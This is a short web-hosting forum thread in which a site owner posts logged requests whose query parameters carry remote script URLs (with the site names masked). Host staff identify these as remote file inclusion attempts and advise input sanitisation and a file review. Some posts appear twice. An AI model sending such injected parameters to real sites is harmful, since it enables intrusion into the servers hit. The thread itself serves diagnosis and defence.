I've noticed when looking at my latest visitors via cpanel that some of them have another site URL attached to the end of some of my pages.<br /><br />Here's an example (I've removed the site name but if it helps, I could post it later or PM it or something):<br /><br />/reviews/2006/index.php?view=page&pagename=http://www.**SITENAME**.com/blog/wp.rss.txt??<br /><br />/reviews/DVD/read.php?id=http://**SITENAME2**.ru/images/cs.txt?<br /><br />/reviews/movie/read.php?id=http://**SITENAME3**.ru/images/cs.txt?<br /><br />/reviews/DVD/read.php?id=http://**SITENAME4**.io/pb.php?<br /><br />Each of those are different sites.<br /><br />When clicking on the links, it doesn't take me to those sites, just gives me my 404 error or loads a blank template (which is mine).<br /><br />Should I be worried or is this normal?<!--content-->
I've seen them in my logs before. I never really paid much attention to them.<!--content-->
Someone is trying to gain access your site by remotely including scripts to upload files for a number of nasty uses. For the most part we block attempts such as these but we can't always catch everything. <br />You should insure your scripts are secure and sanitize any data passed via a URL, also make sure you are not using any open permissions. <br /><br />I would go ahead and open a ticket to the help desk asking for a review of your files to insure nothing has been compromised.<br /><br /><br /><br /><br /><!--content-->
I just checked my MySQL Permissions and somehow the user account I created specifically to just select the data had all its permissions checked... I don't know how that happened since I have another user account I use to do all the other things.<br /><br />I'll open a ticket and have them check and make sure everything is OK.<br /><br />Thanks guys.<!--content-->
I've seen them in my logs before. I never really paid much attention to them.<!--content-->
Someone is trying to gain access your site by remotely including scripts to upload files for a number of nasty uses. For the most part we block attempts such as these but we can't always catch everything. <br />You should insure your scripts are secure and sanitize any data passed via a URL, also make sure you are not using any open permissions. <br /><br />I would go ahead and open a ticket to the help desk asking for a review of your files to insure nothing has been compromised.<br /><br /><br /><br /><br /><!--content-->
I just checked my MySQL Permissions and somehow the user account I created specifically to just select the data had all its permissions checked... I don't know how that happened since I have another user account I use to do all the other things.<br /><br />I'll open a ticket and have them check and make sure everything is OK.<br /><br />Thanks guys.<!--content-->